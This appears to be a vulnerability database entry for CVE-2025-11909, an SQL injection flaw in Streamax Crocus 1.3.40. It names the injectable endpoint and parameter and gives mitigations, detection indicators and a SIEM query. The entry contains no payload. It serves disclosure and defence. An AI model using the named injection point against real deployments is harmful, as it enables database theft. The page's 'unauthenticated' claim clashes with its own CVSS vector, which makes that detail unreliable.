Login Sign Up

CVE-2025-11909

6.3 MEDIUM
SQL Injection

📋 TL;DR

This CVE describes a SQL injection vulnerability in Shenzhen Ruiming Technology's Streamax Crocus system version 1.3.40. Attackers can manipulate the 'orderField' parameter in the /RepairRecord.do?Action=QueryLast endpoint to execute arbitrary SQL commands. Organizations using this specific version of the Streamax Crocus system are affected.

💻 Affected Systems

Products:
  • Shenzhen Ruiming Technology Streamax Crocus
Versions: 1.3.40
Operating Systems: Unknown
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the default configuration of version 1.3.40.

📦 What is this software?

Streamax Crocus by Streamax

View all CVEs affecting Streamax Crocus →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise including data theft, data manipulation, and potential remote code execution through database functions.

🟠

Likely Case

Unauthorized data access, data exfiltration, and potential privilege escalation within the database.

🟢

If Mitigated

Limited impact with proper input validation and database permissions restricting damage to non-critical data.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploit details are publicly available on GitHub, making this easily exploitable by attackers.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch available. Contact Shenzhen Ruiming Technology for updated version information.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement strict input validation for the orderField parameter to only allow expected values

Web Application Firewall

all

Deploy WAF with SQL injection rules to block malicious requests

🧯 If You Can't Patch

  • Isolate the system from internet access and restrict network access to trusted IPs only
  • Implement database monitoring and alerting for suspicious SQL queries

🔍 How to Verify

Check if Vulnerable:

Check if system is running Streamax Crocus version 1.3.40 and test the /RepairRecord.do?Action=QueryLast endpoint with SQL injection payloads in the orderField parameter

Check Version:

Check system documentation or web interface for version information

Verify Fix Applied:

Test the vulnerable endpoint with SQL injection payloads to confirm they are blocked or sanitized

📡 Detection & Monitoring

Log Indicators:

  • Unusual SQL queries in database logs
  • Multiple failed login attempts following SQL injection patterns
  • Requests to /RepairRecord.do with suspicious orderField parameters

Network Indicators:

  • HTTP requests containing SQL keywords in orderField parameter
  • Unusual database traffic patterns

SIEM Query:

web.url:*RepairRecord.do* AND (web.param.orderField:*SELECT* OR web.param.orderField:*UNION* OR web.param.orderField:*OR*)

📊 Metadata

CVE ID: CVE-2025-11909
CVSS v3 Score: 6.3 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
CWE: CWE-74
EPSS Score: 0.04% exploit probability (11th percentile)
Published: October 17, 2025
Last Updated: October 31, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-11909, you might also want to check these:

CVE-2026-25520 10.0

SandboxJS versions before 0.8.29 have a critical sandbox escape vulnerability that allows attackers ...

Same vulnerability type (CWE-74)
CVE-2026-25586 10.0

This CVE describes a sandbox escape vulnerability in SandboxJS library versions before 0.8.29. Attac...

Same vulnerability type (CWE-74)
CVE-2025-20281 10.0

An unauthenticated remote code execution vulnerability in Cisco ISE and ISE-PIC API allows attackers...

Same vulnerability type (CWE-74)